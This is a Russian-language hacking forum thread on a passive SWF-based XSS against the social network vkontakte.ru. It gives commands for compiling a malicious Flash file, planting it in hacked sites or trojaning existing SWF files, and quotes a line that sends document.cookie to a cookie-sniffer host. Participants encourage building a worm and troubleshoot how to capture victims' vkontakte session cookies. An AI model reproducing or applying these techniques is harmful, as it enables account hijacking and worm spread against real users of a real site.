![]() |
vkontakte.ru passive xss (swf)
Качаем mtask
Создаём файлик hek.as с содержанием PHP код:
Код:
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.asСмотрим созданное "приложение" и выдираем ссылку на swf PHP код:
Применение: 1) Можно вставить в сорц похэканного сайта кодес PHP код:
2) Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump Код:
swfdump.exe hek.swfКод:
mtasc.exe -swf hek.swf -main -header x:y:z hek.asи вживляем Код:
swfcombine.exe -o hek_movie.swf -T hek.swf movie.swfСсылки по теме: http://tech.motion-twin.com/zip/mtasc-1.12.zip http://www.swftools.org/swftools-0.7.0.exe |
Фига Тох :)
+5 |
Авторегер есть, спамилка по id есть, теперь и ксс есть. Хуярьте товарищи червя... ;)
|
Или я непохеккер или оно не работает. Алерты все на ура, но при добавлении конструкций типа:
Код:
javascript:eval(String.fromCharCode(bla-bla-bla))Код:
img=new Image(); img.src="http://гаткей_снеффер.gif?"+document.cookie; |
Ха....ништяк, молодец
|
sniffer.php
PHP код:
PHP код:
|
Может я не фтыкнул чет, но...когда вручную заходишь на демку
то куки норм, а если через сайт подставной...т.е. кодом, то приходит Код:
__utma=52566834.124252957.1203944691.1203944691.1206562305.2;%20__utmz=52566834.1203944691.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);%20__utmb=52566834;%20__utmc=52566834;%20jcpu=1;%20pcnt=4;%20pcls=1 |
Все очень просто. Если вы делаете embed то получаете куки своего сайта. А если делать iframe то будут куки vkontakte
|
Swf у меня не вызывается через ифрейм
|
гм у меня на опере вызывается
|
| Время: 21:08 |